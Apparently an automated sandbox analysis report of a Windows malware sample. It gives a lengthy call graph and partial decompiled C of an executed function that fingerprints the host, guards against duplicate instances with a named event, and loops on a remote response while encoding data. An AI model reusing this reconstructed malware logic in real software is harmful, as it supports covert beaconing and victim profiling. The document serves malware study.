23796 402e2b 23795->23796 23797 403b11 22 API calls 23796->23797 23798 402e42 23797->23798 23799 403b11 22 API calls 23798->23799 23800 402e59 23799->23800 23801 403b11 22 API calls 23800->23801 23802 402e6f 23801->23802 23803 403b11 22 API calls 23802->23803 23804 402e85 23803->23804 23805 403b11 22 API calls 23804->23805 23806 402e9b 23805->23806 23807 403b11 22 API calls 23806->23807 23808 402eb2 23807->23808 23809 403b11 22 API calls 23808->23809 23810 402ec8 23809->23810 23811 403b11 22 API calls 23810->23811 23812 402edf 23811->23812 23813 403b11 22 API calls 23812->23813 23814 402ef6 23813->23814 23815 403b11 22 API calls 23814->23815 23816 402f0c 23815->23816 23817 403b11 22 API calls 23816->23817 23818 402f23 23817->23818 23819 403b11 22 API calls 23818->23819 23820 402f3a 23819->23820 23821 403b11 22 API calls 23820->23821 23822 402f50 23821->23822 23823 403b11 22 API calls 23822->23823 23824 402f66 23823->23824 23825 403b11 22 API calls 23824->23825 23826 402f7d 23825->23826 23827 403b11 22 API calls 23826->23827 23828 402f94 23827->23828 23829 403b11 22 API calls 23828->23829 23830 402fab 23829->23830 23831 403b11 22 API calls 23830->23831 23832 402fc2 23831->23832 23833 403b11 22 API calls 23832->23833 23834 402fd9 23833->23834 23835 403b11 22 API calls 23834->23835 23836 402fef 23835->23836 23837 403b11 22 API calls 23836->23837 23838 403005 23837->23838 23839 403b11 22 API calls 23838->23839 23840 40301c 23839->23840 23841 403b11 22 API calls 23840->23841 23842 403032 23841->23842 23843 403b11 22 API calls 23842->23843 23844 403048 23843->23844 23845 403b11 22 API calls 23844->23845 23846 40305f 23845->23846 23847 403b11 22 API calls 23846->23847 23848 403076 23847->23848 23849 403b11 22 API calls 23848->23849 23850 40308d 23849->23850 23851 403b11 22 API calls 23850->23851 23852 4030a3 23851->23852 23853 403b11 22 API calls 23852->23853 23854 4030ba 23853->23854 23855 403b11 22 API calls 23854->23855 23856 4030d0 23855->23856 23857 403b11 22 API calls 23856->23857 23858 4030e7 23857->23858 23859 403b11 22 API calls 23858->23859 23860 4030fe 23859->23860 23861 403b11 22 API calls 23860->23861 23862 403115 23861->23862 23863 403b11 22 API calls 23862->23863 23864 40312b 23863->23864 23865 403b11 22 API calls 23864->23865 23866 403142 23865->23866 23867 403b11 22 API calls 23866->23867 23868 403159 23867->23868 23869 403b11 22 API calls 23868->23869 23870 403170 23869->23870 23871 403b11 22 API calls 23870->23871 23872 403187 23871->23872 23873 403b11 22 API calls 23872->23873 23874 40319d 23873->23874 23875 403b11 22 API calls 23874->23875 23876 4031b4 23875->23876 23877 403b11 22 API calls 23876->23877 23878 4031cb 23877->23878 23879 403b11 22 API calls 23878->23879 23880 4031e2 23879->23880 23881 403b11 22 API calls 23880->23881 23882 4031f9 23881->23882 23883 403b11 22 API calls 23882->23883 23884 403210 23883->23884 23885 403b11 22 API calls 23884->23885 23886 403227 23885->23886 23887 403b11 22 API calls 23886->23887 23888 40323e 23887->23888 23889 403b11 22 API calls 23888->23889 23890 403255 23889->23890 23891 403b11 22 API calls 23890->23891 23892 40326c 23891->23892 23893 403b11 22 API calls 23892->23893 23894 403283 23893->23894 23895 403b11 22 API calls 23894->23895 23896 403299 23895->23896 23897 403b11 22 API calls 23896->23897 23898 4032af 23897->23898 23899 403b11 22 API calls 23898->23899 23900 4032c6 23899->23900 23901 403b11 22 API calls 23900->23901 23902 4032dd 23901->23902 23903 403b11 22 API calls 23902->23903 23904 4032f3 23903->23904 23905 403b11 22 API calls 23904->23905 23906 403309 23905->23906 23907 403b11 22 API calls 23906->23907 23908 40331f 23907->23908 23909 403b11 22 API calls 23908->23909 23910 403335 23909->23910 23911 403b11 22 API calls 23910->23911 23912 40334c 23911->23912 23913 403b11 22 API calls 23912->23913 23914 403362 23913->23914 23915 403b11 22 API calls 23914->23915 23916 403379 23915->23916 23917 403b11 22 API calls 23916->23917 23918 403390 23917->23918 23919 403b11 22 API calls 23918->23919 23920 4033a6 23919->23920 23921 403b11 22 API calls 23920->23921 23922 4033bc 23921->23922 23923 403b11 22 API calls 23922->23923 23924 4033d2 23923->23924 23925 403b11 22 API calls 23924->23925 23926 4033e9 23925->23926 23927 403b11 22 API calls 23926->23927 23928 403400 23927->23928 23929 403b11 22 API calls 23928->23929 23930 403417 23929->23930 23931 403b11 22 API calls 23930->23931 23932 40342e 23931->23932 23933 403b11 22 API calls 23932->23933 23934 403444 23933->23934 23935 403b11 22 API calls 23934->23935 23936 40345a 23935->23936 23937 403b11 22 API calls 23936->23937 23938 403470 23937->23938 23939 403b11 22 API calls 23938->23939 23940 403487 23939->23940 23941 403b11 22 API calls 23940->23941 23942 40349e 23941->23942 23943 403b11 22 API calls 23942->23943 23944 4034b5 23943->23944 23945 403b11 22 API calls 23944->23945 23946 4034cb 23945->23946 23947 403b11 22 API calls 23946->23947 23948 4034e1 23947->23948 23949 403b11 22 API calls 23948->23949 23950 4034f8 23949->23950 23951 403b11 22 API calls 23950->23951 23952 40350f 23951->23952 23953 403b11 22 API calls 23952->23953 23954 403526 23953->23954 23955 403b11 22 API calls 23954->23955 23956 40353d 23955->23956 23957 403b11 22 API calls 23956->23957 23958 403553 23957->23958 23959 403b11 22 API calls 23958->23959 23960 40356a 23959->23960 23961 403b11 22 API calls 23960->23961 23962 403581 23961->23962 23963 403b11 22 API calls 23962->23963 23964 403598 23963->23964 23965 403b11 22 API calls 23964->23965 23966 4035ae 23965->23966 23967 403b11 22 API calls 23966->23967 23968 4035c5 23967->23968 23969 403b11 22 API calls 23968->23969 23970 4035dc 23969->23970 23971 403b11 22 API calls 23970->23971 23972 4035f3 23971->23972 23973 403b11 22 API calls 23972->23973 23974 40360a 23973->23974 23975 403b11 22 API calls 23974->23975 23976 403621 23975->23976 23977 403b11 22 API calls 23976->23977 23978 403638 23977->23978 23979 403b11 22 API calls 23978->23979 23980 40364f 23979->23980 23981 403b11 22 API calls 23980->23981 23982 403666 23981->23982 23983 403b11 22 API calls 23982->23983 23984 40367d 23983->23984 23985 403b11 22 API calls 23984->23985 23986 403693 23985->23986 23987 403b11 22 API calls 23986->23987 23988 4036aa 23987->23988 23989 403b11 22 API calls 23988->23989 23990 4036c1 23989->23990 23991 403b11 22 API calls 23990->23991 23992 4036d8 23991->23992 23993 403b11 22 API calls 23992->23993 23994 4036ee 23993->23994 23995 403b11 22 API calls 23994->23995 23996 403705 23995->23996 23997 403b11 22 API calls 23996->23997 23998 40371c 23997->23998 23999 403b11 22 API calls 23998->23999 24000 403733 23999->24000 24001 403b11 22 API calls 24000->24001 24002 40374a 24001->24002 24003 403b11 22 API calls 24002->24003 24004 403761 24003->24004 24005 403b11 22 API calls 24004->24005 24006 403778 24005->24006 24007 403b11 22 API calls 24006->24007 24008 40378e 24007->24008 24009 403b11 22 API calls 24008->24009 24010 4037a5 24009->24010 24011 403b11 22 API calls 24010->24011 24012 4037bc 24011->24012 24013 403b11 22 API calls 24012->24013 24014 4037d3 24013->24014 24015 403b11 22 API calls 24014->24015 24016 4037ec 24015->24016 24017 403b11 22 API calls 24016->24017 24018 403802 24017->24018 24019 403b11 22 API calls 24018->24019 24020 403818 24019->24020 24021 403b11 22 API calls 24020->24021 24022 40382e 24021->24022 24023 403b11 22 API calls 24022->24023 24024 403845 24023->24024 24025 403b11 22 API calls 24024->24025 24026 40385b 24025->24026 24027 403b11 22 API calls 24026->24027 24028 403872 24027->24028 24029 403b11 22 API calls 24028->24029 24030 403889 24029->24030 24031 403b11 22 API calls 24030->24031 24032 4038a0 24031->24032 24033 403b11 22 API calls 24032->24033 24034 4038b7 24033->24034 24035 403b11 22 API calls 24034->24035 24036 4038ce 24035->24036 24037 403b11 22 API calls 24036->24037 24038 4038e5 24037->24038 24039 403b11 22 API calls 24038->24039 24040 4038fc 24039->24040 24041 403b11 22 API calls 24040->24041 24042 403913 24041->24042 24043 403b11 22 API calls 24042->24043 24044 40392a 24043->24044 24045 403b11 22 API calls 24044->24045 24046 403941 24045->24046 24047 403b11 22 API calls 24046->24047 24048 403957 24047->24048 24049 403b11 22 API calls 24048->24049 24050 40396e 24049->24050 24051 403b11 22 API calls 24050->24051 24052 403984 24051->24052 24053 403b11 22 API calls 24052->24053 24054 40399a 24053->24054 24055 403b11 22 API calls 24054->24055 24056 4039b1 24055->24056 24057 403b11 22 API calls 24056->24057 24058 4039c8 24057->24058 24059 403b11 22 API calls 24058->24059 24060 4039df 24059->24060 24061 403b11 22 API calls 24060->24061 24062 4039f6 24061->24062 24063 403b11 22 API calls 24062->24063 24064 403a0d 24063->24064 24065 403b11 22 API calls 24064->24065 24066 403a26 24065->24066 24067 403b11 22 API calls 24066->24067 24068 403a3d 24067->24068 24069 403b11 22 API calls 24068->24069 24070 403a53 24069->24070 24071 403b11 22 API calls 24070->24071 24072 403a69 24071->24072 24073 403b11 22 API calls 24072->24073 24074 403a7f 24073->24074 24075 403b11 22 API calls 24074->24075 24076 403a95 24075->24076 24077 403b11 22 API calls 24076->24077 24078 403aac 24077->24078 24079 403b11 22 API calls 24078->24079 24080 403ac3 24079->24080 24081 403b11 22 API calls 24080->24081 24082 403ada 24081->24082 24083 403b11 22 API calls 24082->24083 24084 403af0 24083->24084 24085 403b11 22 API calls 24084->24085 24086 403b07 24085->24086 24087 418b05 24086->24087 24088 418b12 59 API calls 24087->24088 24089 41905a 11 API calls 24087->24089 24088->24089 24090 419122 6 API calls 24089->24090 24091 4191a7 24089->24091 24090->24091 24092 4191f0 24091->24092 24093 4191b0 GetProcAddress GetProcAddress GetProcAddress 24091->24093 24094 419351 24092->24094 24095 4191fd 15 API calls 24092->24095 24093->24092 24096 419484 24094->24096 24097 41935e 13 API calls 24094->24097 24095->24094 24098 419491 7 API calls 24096->24098 24099 41952d 24096->24099 24097->24096 24098->24099 24100 4195a4 24099->24100 24101 419536 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 24099->24101 24102 4195b1 11 API calls 24100->24102 24103 4196a9 24100->24103 24101->24100 24102->24103 24104 4196f2 24103->24104 24105 4196b2 GetProcAddress GetProcAddress GetProcAddress 24103->24105 24106 41973b 24104->24106 24107 4196fb GetProcAddress GetProcAddress GetProcAddress 24104->24107 24105->24104 24108 419748 6 API calls 24106->24108 24109 4197cd 24106->24109 24107->24106 24108->24109 24110 4197d6 GetProcAddress 24109->24110 24111 4197e8 24109->24111 24110->24111 24112 4197f5 8 API calls 24111->24112 24113 40b84f 24111->24113 24112->24113 24114 414c66 24113->24114 24182 42083e 24114->24182 24116 414c75 GetWindowsDirectoryA 24117 414cc2 GetVolumeInformationA 24116->24117 24118 414cbb 24116->24118 24119 414d29 24117->24119 24118->24117 24119->24119 24120 414d3e GetProcessHeap HeapAlloc 24119->24120 24121 414d82 wsprintfA 24120->24121 24122 414d59 24120->24122 24183 40c297 24121->24183 24202 404331 24122->24202 24125 414f07 24126 414e06 24129 415326 78 API calls 24126->24129 24127 414db2 24127->24125 24127->24126 24206 41fcbb 85 API calls __tolower_l 24127->24206 24131 414e11 24129->24131 24130 40b87d lstrcatA 24130->23067 24187 40c034 24131->24187 24137 40c034 77 API calls 24138 414e49 24137->24138 24207 415bad 77 API calls 24138->24207 24140 414e61 24208 4046ce 77 API calls 24140->24208 24142 414d6d ctype 24199 420888 24142->24199 24144 41535e 24143->24144 24145 404331 numpunct 77 API calls 24144->24145 24146 41536e 24145->24146 24147 41da9b setSBUpLow 5 API calls 24146->24147 24148 40b8bb lstrcatA 24147->24148 24148->23071 24280 42083e 24149->24280 24151 414f1a GetSystemInfo 24281 415f45 24151->24281 24155 414f47 ctype 24156 420888 ctype 5 API calls 24155->24156 24157 40b8f9 lstrcatA 24156->24157 24157->23075 24159 404331 numpunct 77 API calls 24158->24159 24160 4083b1 lstrcatA 24159->24160 24160->23103 24162 404331 numpunct 77 API calls 24161->24162 24163 4083f7 24162->24163 24163->23103 24165 404331 numpunct 77 API calls 24164->24165 24166 40841a 24165->24166 24166->23103 24167->23090 24168->23097 24169->23101 24170->23107 24171->23109 24172->23111 24173->23112 24174->23115 24175->23116 24176->23118 24177->23120 24178->23123 24179->23138 24180->23138 24181->23141 24182->24116 24184 40c29e 24183->24184 24184->24184 24209 40c2e9 24184->24209 24186 40c2b7 24186->24127 24257 40440a 24187->24257 24189 40c059 24190 41537d 24189->24190 24271 426300 24190->24271 24192 4153bd RegOpenKeyExA 24193 4153f9 RegCloseKey CharToOemA 24192->24193 24194 4153de RegQueryValueExA 24192->24194 24195 404331 numpunct 77 API calls 24193->24195 24194->24193 24196 41542a 24195->24196 24197 41da9b setSBUpLow 5 API calls 24196->24197 24198 414e36 24197->24198 24198->24137 24200 41da9b setSBUpLow 5 API calls 24199->24200 24201 420892 24200->24201 24201->24201 24203 40433b 24202->24203 24203->24203 24273 404396 24203->24273 24205 404350 24205->24142 24206->24127 24207->24140 24208->24142 24210 40c2f9 numpunct 24209->24210 24211 40c2fd 24210->24211 24212 40c316 24210->24212 24218 404799 77 API calls 3 library calls 24211->24218 24213 40c32c 24212->24213 24219 41cfa0 67 API calls 2 library calls 24212->24219 24217 40c314 _memmove 24213->24217 24220 4044a3 24213->24220 24217->24186 24218->24217 24219->24213 24221 4044ad 24220->24221 24223 4044b7 24220->24223 24230 41cfa0 67 API calls 2 library calls 24221->24230 24225 4044c7 ctype 24223->24225 24226 4045b4 24223->24226 24225->24217 24227 4045c0 __EH_prolog3_catch 24226->24227 24231 404719 24227->24231 24229 40460b std::locale::_Locimp::_Locimp_dtor ctype _memmove 24229->24225 24230->24223 24232 404726 24231->24232 24233 40475e 24231->24233 24234 404734 24232->24234 24239 41e24d 24232->24239 24233->24229 24234->24233 24251 41dc00 66 API calls std::exception::_Copy_str 24234->24251 24237 404749 24252 41ff86 RaiseException 24237->24252 24242 41e257 24239->24242 24240 41dae4 _malloc 66 API calls 24240->24242 24241 41e271 24241->24234 24242->24240 24242->24241 24246 41e273 std::exception::exception 24242->24246 24253 4235e2 DecodePointer 24242->24253 24244 41e2b1 24255 41dc85 66 API calls std::exception::operator= 24244->24255 24246->24244 24254 41ed20 76 API calls __cinit 24246->24254 24247 41e2bb 24256 41ff86 RaiseException 24247->24256 24250 41e2cc 24251->24237 24252->24233 24253->24242 24254->24244 24255->24247 24256->24250 24258 404429 24257->24258 24259 40441f 24257->24259 24261 404453 24258->24261 24262 404439 24258->24262 24268 41cfed 67 API calls 2 library calls 24259->24268 24264 4044a3 numpunct 77 API calls 24261->24264 24269 40453e 67 API calls 2 library calls 24262->24269 24267 404451 _memmove 24264->24267 24265 404445 24270 40453e 67 API calls 2 library calls 24265->24270 24267->24189 24268->24258 24269->24265 24270->24267 24272 42630c 24271->24272 24272->24192 24272->24272 24274 4043a4 numpunct 24273->24274 24275 4043c5 24274->24275 24276 4043a8 24274->24276 24277 4044a3 numpunct 77 API calls 24275->24277 24278 40440a numpunct 77 API calls 24276->24278 24279 4043c3 _memmove 24277->24279 24278->24279 24279->24205 24280->24151 24282 415f54 __EH_prolog3_GS 24281->24282 24298 414325 24282->24298 24284 415fa8 24302 417359 24284->24302 24286 415ff8 24306 416879 24286->24306 24288 41600e 24320 416c31 24288->24320 24290 41601d ctype 24323 41d1c9 24290->24323 24292 416057 24293 420888 ctype 5 API calls 24292->24293 24294 414f33 24293->24294 24295 4042a9 24294->24295 24296 404331 numpunct 77 API calls 24295->24296 24297 4042c3 24296->24297 24297->24155 24299 414331 __EH_prolog3 24298->24299 24327 41462b 24299->24327 24301 41435a std::locale::_Locimp::_Locimp_dtor 24301->24284 24303 417365 __EH_prolog3 24302->24303 24435 4146a9 24303->24435 24305 417371 std::locale::_Locimp::_Locimp_dtor 24305->24286 24307 416885 __EH_prolog3_catch 24306->24307 24451 417477 24307->24451 24309 416896 24310 40e367 2 API calls 24309->24310 24319 4168c6 24309->24319 24314 4168b1 24310->24314 24311 416940 24455 4174d3 24311->24455 24459 418678 114 API calls 7 library calls 24314->24459 24315 41694d std::locale::_Locimp::_Locimp_dtor 24315->24288 24317 4168bb 24318 40e0fe std::ios_base::_Ios_base_dtor 2 API calls 24317->24318 24318->24319 24319->24311 24460 413809 67 API calls 24319->24460 24463 4173aa 24320->24463 24324 41d1d8 std::ios_base::_Tidy 24323->24324 24325 40e0fe std::ios_base::_Ios_base_dtor 2 API calls 24324->24325 24326 41d1fd ctype 24324->24326 24325->24326 24326->24292 24328 41e24d std::_Mutex::_Mutex 77 API calls 24327->24328 24329 41465f 24328->24329 24330 414679 24329->24330 24338 41d4d4 24329->24338 24354 414754 24330->24354 24332 41466b 24362 40e094 24332->24362 24334 414692 24335 4146a4 24334->24335 24367 413809 67 API calls 24334->24367 24335->24301 24339 41d4e0 __EH_prolog3 24338->24339 24340 41d55b std::locale::_Locimp::_Locimp_dtor 24339->24340 24368 41d5bd 24339->24368 24340->24332 24344 41e24d std::_Mutex::_Mutex 77 API calls 24345 41d50b 24344->24345 24346 41d518 24345->24346 24376 41d431 66 API calls _Yarn 24345->24376 24372 41d299 24346->24372 24351 41d538 24352 40e094 std::locale::facet::_Incref 2 API calls 24351->24352 24353 41d545 24352->24353 24378 41d5e5 24353->24378 24355 414760 __EH_prolog3 24354->24355 24399 40e367 24355->24399 24359 414775 24420 40e0fe 24359->24420 24361 414784 std::locale::_Locimp::_Locimp_dtor 24361->24334 24363 41d5bd std::_Lockit::_Lockit EnterCriticalSection 24362->24363 24364 40e0a5 24363->24364 24365 41d5e5 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 24364->24365 24366 40e0b9 24365->24366 24366->24330 24367->24335 24369 41d5cf 24368->24369 24371 41d4f6 24368->24371 24382 41da28 EnterCriticalSection 24369->24382 24371->24344 24371->24353 24373 41d2a7 24372->24373 24374 41d2b8 24372->24374 24383 41d9ab 24373->24383 24377 41d38c 66 API calls 3 library calls 24374->24377 24376->24346 24377->24351 24379 41d5fa 24378->24379 24380 41d5ec 24378->24380 24379->24340 24398 41da38 LeaveCriticalSection 24380->24398 24382->24371 24384 41d9b9 24383->24384 24385 41d9bf RtlEncodePointer 24383->24385 24394 42d1ae DecodePointer 24384->24394 24385->24374 24387 422e83 24388 422e8e 24387->24388 24395 42d1bb 67 API calls 8 library calls 24387->24395 24390 422ea6 24388->24390 24396 423890 8 API calls 3 library calls 24388->24396 24397 423373 66 API calls _doexit 24390->24397 24393 422eb0 24394->24387 24395->24388 24396->24390 24397->24393 24398->24379 24400 40e094 std::locale::facet::_Incref 2 API calls 24399->24400 24401 40e373 24400->24401 24402 4148dc 24401->24402 24403 4148e8 __EH_prolog3 24402->24403 24404 41d5bd std::_Lockit::_Lockit EnterCriticalSection 24403->24404 24405 4148f2 24404->24405 24424 40e063 24405->24424 24407 41491d 24409 41d5e5 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 24407->24409 24408 414909 24408->24407 24430 40e14b 114 API calls 4 library calls 24408->24430 24410 414972 std::locale::_Locimp::_Locimp_dtor 24409->24410 24410->24359 24412 41492d 24413 41494f 24412->24413 24431 41dc67 66 API calls std::exception::exception 24412->24431 24415 40e094 std::locale::facet::_Incref 2 API calls 24413->24415 24417 41495f 24415->24417 24416 414941 24432 41ff86 RaiseException 24416->24432 24433 41d21c 77 API calls std::_Mutex::_Mutex 24417->24433 24421 40e104 24420->24421 24422 40e109 24420->24422 24434 40e0bc EnterCriticalSection LeaveCriticalSection std::locale::_Locimp::_Locimp_dtor std::_Lockit::_Lockit 24421->24434 24422->24361 24425 40e090 24424->24425 24426 40e06c 24424->24426 24425->24408 24427 41d5bd std::_Lockit::_Lockit EnterCriticalSection 24426->24427 24428 40e076 24427->24428 24429 41d5e5 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 24428->24429 24429->24425 24430->24412 24431->24416 24432->24413 24433->24407 24434->24422 24436 4146b5 __EH_prolog3 24435->24436 24445 41d5fc 24436->24445 24439 41e24d std::_Mutex::_Mutex 77 API calls 24440 4146d1 24439->24440 24441 41d4d4 std::locale::_Init 82 API calls 24440->24441 24443 4146eb std::locale::_Locimp::_Locimp_dtor ctype 24440->24443 24442 4146dd 24441->24442 24444 40e094 std::locale::facet::_Incref 2 API calls 24442->24444 24443->24305 24444->24443 24446 41e24d std::_Mutex::_Mutex 77 API calls 24445->24446 24447 41d608 24446->24447 24450 41da08 InitializeCriticalSection 24447->24450 24449 4146c6 24449->24439 24450->24449 24452 417483 __EH_prolog3 24451->24452 24453 4174b9 std::locale::_Locimp::_Locimp_dtor 24452->24453 24461 4137ca 67 API calls 24452->24461 24453->24309 24456 4174df __EH_prolog3 24455->24456 24458 4174f6 std::locale::_Locimp::_Locimp_dtor 24456->24458 24462 417cf2 67 API calls 2 library calls 24456->24462 24458->24315 24459->24317 24460->24311 24461->24453 24462->24458 24464 4173b6 __EH_prolog3_GS 24463->24464 24465 4173cb 24464->24465 24466 41740a 24464->24466 24467 404396 numpunct 77 API calls 24465->24467 24468 404396 numpunct 77 API calls 24466->24468 24469 4173f3 ctype 24466->24469 24467->24469 24468->24469 24470 420888 ctype 5 API calls 24469->24470 24471 416c44 24470->24471 24471->24290

                                                                    Executed Functions

                                                                    Function 0040B7EC Relevance: 52.9, APIs: 27, Strings: 3, Instructions: 430stringsleepmemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 42 40b7ec-40b864 call 40121a call 418b05 47 40b86b-40b86f 42->47 47->47 48 40b871-40b889 call 414c66 47->48 51 40b88b 48->51 52 40b88d-40b8c7 lstrcatA call 404354 call 415326 48->52 51->52 57 40b8c9 52->57 58 40b8cb-40b905 lstrcatA call 404354 call 414f0e 52->58 57->58 63 40b907 58->63 64 40b909-40b933 lstrcatA call 404354 58->64 63->64 67 40b947-40b95e OpenEventA 64->67 68 40b960-40b97b CreateEventA 67->68 69 40b935-40b941 CloseHandle Sleep 67->69 70 40b982-40b986 68->70 69->67 70->70 71 40b988-40b9b3 lstrcatA call 408392 70->71 74 40b9b5 71->74 75 40b9b7-40b9dc lstrcatA call 404354 71->75 74->75 78 40b9e1-40ba25 call 4083d8 call 40841e call 40a9fd 75->78 85 40ba27 78->85 86 40ba29-40ba37 StrCmpCA 78->86 85->86 87 40ba81-40ba8d 86->87 88 40ba39-40ba7e call 404331 call 404778 call 40ab1d 86->88 89 40ba91-40ba9f StrCmpCA 87->89 90 40ba8f 87->90 88->87 93 40bb75-40bb84 call 41cdbd 89->93 94 40baa5-40bae9 call 4083fb call 40841e call 40a9fd 89->94 90->89 103 40bb8b-40bb8f 93->103 113 40baeb 94->113 114 40baed-40bafb StrCmpCA 94->114 103->103 104 40bb91-40bb98 103->104 107 40bba0-40bc76 lstrcatA * 2 call 415ef6 lstrcatA * 2 call 40de3a call 408202 call 40ac0f call 4133b9 104->107 108 40bb9a 104->108 134 40bc78 call 40903e 107->134 135 40bc7d-40bc88 call 40afb3 107->135 108->107 113->114 115 40bb45-40bb51 114->115 116 40bafd-40bb42 call 404331 call 404778 call 40ab1d 114->116 120 40bb53 115->120 121 40bb55-40bb63 StrCmpCA 115->121 116->115 120->121 121->93 124 40bb65-40bb70 Sleep 121->124 124->78 134->135 139 40bc93-40bc99 135->139 140 40bc8a-40bc8e call 40cb83 135->140 142 40bca0-40bca6 139->142 143 40bc9b call 409e88 139->143 140->139 145 40bca8 call 4166f5 142->145 146 40bcad-40bccb call 41ced3 142->146 143->142 145->146 150 40bd26-40bd49 CreateThread 146->150 151 40bccd-40bce9 CryptBinaryToStringA 146->151 152 40bda2-40bda8 150->152 151->150 153 40bceb-40bd01 GetProcessHeap HeapAlloc 151->153 154 40bdaa-40bdbb Sleep 152->154 155 40bd4b-40bd51 152->155 153->150 156 40bd03-40bd09 153->156 154->154 159 40bdbd-40bdd1 CloseHandle 154->159 155->159 160 40bd53-40bd5a 155->160 157 40bd11-40bd20 CryptBinaryToStringA 156->157 158 40bd0b-40bd0f 156->158 157->150 158->157 158->158 161 40bdd3-40bddb 159->161 162 40bde6 call 41cf3e 159->162 163 40bd73-40bd7a 160->163 164 40bd5c 160->164 161->162 165 40bddd-40bde4 call 408318 161->165 172 40bdeb-40be1f call 4164a1 call 404354 call 41da9b 162->172 166 40bd86-40bd90 CreateThread 163->166 169 40bd7c-40bd7f 163->169 164->166 167 40bd5e-40bd65 164->167 165->172 174 40bd96-40bda1 Sleep 166->174 167->166 171 40bd67-40bd69 167->171 169->166 173 40bd81 169->173 171->166 176 40bd6b-40bd6d 171->176 178 40bd84 173->178 174->152 176->166 179 40bd6f-40bd71 176->179 178->166 178->174 179->178
                                                                    C-Code - Quality: 85%
                                                                    			E0040B7EC(void* __edx, void* __fp0) {
				char _v8;
				char _v16;
				char _v20;
				signed int _v24;
				char _v36;
				char _v40;
				intOrPtr _v44;
				signed int _v52;
				char _v1044;
				char _v2028;
				char _v2292;
				char _v2300;
				char _v2316;
				char _v2320;
				char _v2348;
				char _v2376;
				char _v2384;
				char _v2404;
				char _v2412;
				intOrPtr _v2420;
				struct _SECURITY_ATTRIBUTES* _v2424;
				char _v2440;
				char _v2456;
				signed int _v2460;
				intOrPtr _v2484;
				char _v2486;
				char _v2487;
				char _v2488;
				char _v2489;
				char _v2490;
				char _v2491;
				char _v2492;
				int _v2496;
				intOrPtr _v2500;
				BYTE* _v2504;
				intOrPtr _v2508;
				int _v2512;
				void _v2516;
				void _v2520;
				int _v2536;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t99;
				signed int _t101;
				char* _t106;
				CHAR* _t107;
				CHAR* _t111;
				CHAR* _t115;
				void* _t120;
				char* _t124;
				CHAR* _t127;
				CHAR* _t134;
				void* _t135;
				CHAR* _t136;
				void* _t137;
				char* _t139;
				void* _t144;
				void* _t150;
				void* _t152;
				signed int _t156;
				signed int _t161;
				void* _t164;
				signed int _t170;
				signed int _t173;
				signed int _t176;
				signed int _t177;
				signed int _t181;
				char* _t183;
				CHAR* _t193;
				void* _t194;
				CHAR* _t195;
				void* _t196;
				void* _t207;
				long _t208;
				void* _t213;
				signed int _t215;
				char _t218;
				char _t219;
				char _t220;
				char _t221;
				char _t222;
				signed int _t223;
				void* _t232;
				signed int _t233;
				void* _t234;
				void* _t235;
				CHAR* _t237;
				char* _t240;
				signed int _t241;
				signed int _t242;
				void* _t243;
				void* _t244;
				_Unknown_base(*)()* _t251;
				void* _t252;
				void* _t256;
				signed int _t257;
				signed int _t259;
				char _t260;
				intOrPtr _t261;
				void* _t262;
				signed int _t263;
				intOrPtr _t264;
				intOrPtr _t265;
				char* _t266;
				void _t267;
				char* _t268;
				BYTE* _t269;
				void* _t285;

				_t285 = __fp0;
				_t234 = __edx;
				_push(0xffffffff);
				_push(E00434E59);
				_push( *[fs:0x0]);
				_t259 = (_t257 & 0xfffffff8) - 0x9b8;
				_t99 =  *0x443674; // 0x393162b1
				_v24 = _t99 ^ _t259;
				_push(_t244);
				_push(_t235);
				_t101 =  *0x443674; // 0x393162b1
				_push(_t101 ^ _t259);
				 *[fs:0x0] =  &_v16;
				_v2420 = 0xf;
				_v2424 = 0;
				_v2440 = 0;
				_v8 = 0;
				E0040121A();
				E00418B05();
				 *0x4461ec = 0x9c40;
				 *0x4461f8 = 0;
				_t208 = 0x3e8;
				_t106 =  &_v2028;
				do {
					 *_t106 = 0;
					_t106 = _t106 + 1;
					_t208 = _t208 - 1;
					_t271 = _t208;
				} while (_t208 != 0);
				_t107 = E00414C66(0,  &_v2348, _t235, _t244, _t271); // executed
				_v8 = 1;
				if(_t107[0x14] >= 0x10) {
					_t107 =  *_t107;
				}
				lstrcatA( &_v2028, _t107);
				_v8 = 0;
				E00404354( &_v2348, 1, 0);
				_t245 =  &_v2412;
				_t111 = E00415326(_t235,  &_v2412); // executed
				_v16 = 2;
				_t273 = _t111[0x14] - 0x10;
				if(_t111[0x14] >= 0x10) {
					_t111 =  *_t111;
				}
				lstrcatA( &_v2028, _t111);
				_v8 = 0;
				E00404354( &_v2404, 1, 0);
				_t115 = E00414F0E(0, _t234,  &_v2384, _t245, _t273); // executed
				_v16 = 3;
				if(_t115[0x14] >= 0x10) {
					_t115 =  *_t115;
				}
				lstrcatA( &_v2028, _t115);
				_v8 = 0;
				E00404354( &_v2376, 1, 0);
				while(1) {
					_t120 = OpenEventA(0x1f0003, 0,  &_v2028);
					 *0x4461f4 = _t120;
					if(_t120 == 0) {
						break;
					}
					CloseHandle(_t120);
					Sleep(0x1388);
				}
				 *0x4461f4 = CreateEventA(0, 0, 0,  &_v2028);
				_t213 = 0x104;
				_t124 =  &_v2292;
				do {
					 *_t124 = 0;
					_t124 = _t124 + 1;
					_t213 = _t213 - 1;
				} while (_t213 != 0);
				lstrcatA( &_v2292, "/");
				_t127 = E00408392( &_v2320);
				_v8 = 4;
				_t277 = _t127[0x14] - 0x10;
				if(_t127[0x14] >= 0x10) {
					_t127 =  *_t127;
				}
				lstrcatA( &_v2292, _t127);
				_t214 =  &_v2320;
				_v8 = 0;
				E00404354( &_v2320, 1, 0);
				_t237 = 0x4442dc;
				while(1) {
					_push("|");
					_t260 = _t259 - 0x1c;
					_v2492 = _t260;
					E004083D8(_t260);
					_t261 = _t260 - 0x1c;
					_v8 = 6;
					_t249 = _t261;
					_v2484 = _t261;
					E0040841E(_t261);
					_v8 = 0;
					E0040A9FD(0, _t214, _t234, _t237, _t261, _t277);
					_t134 =  *0x4442dc; // 0x4be1588
					_t262 = _t261 + 0x3c;
					if( *0x4442f0 < 0x10) {
						_t134 = _t237;
					}
					_t135 =  *0x446458(_t134, "ERROR");
					_t279 = _t135;
					if(_t135 != 0) {
						_t268 = _t262 - 0x1c;
						_t214 = _t268;
						_v2492 = _t268;
						 *((intOrPtr*)(_t214 + 0x14)) = 0xf;
